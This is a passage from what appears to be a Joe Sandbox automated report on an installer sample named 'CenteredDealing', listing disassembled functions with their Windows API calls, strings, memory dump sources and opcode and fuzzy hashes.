                                                                                                                                                                                                                                                                        • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                                                                                        Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(0001D800,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                                                                                                        Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                        • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                        • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                        • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                                                                                        Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                        • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                        • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                        Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                        • String ID: $@rD
                                                                                                                                                                                                                                                                        • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
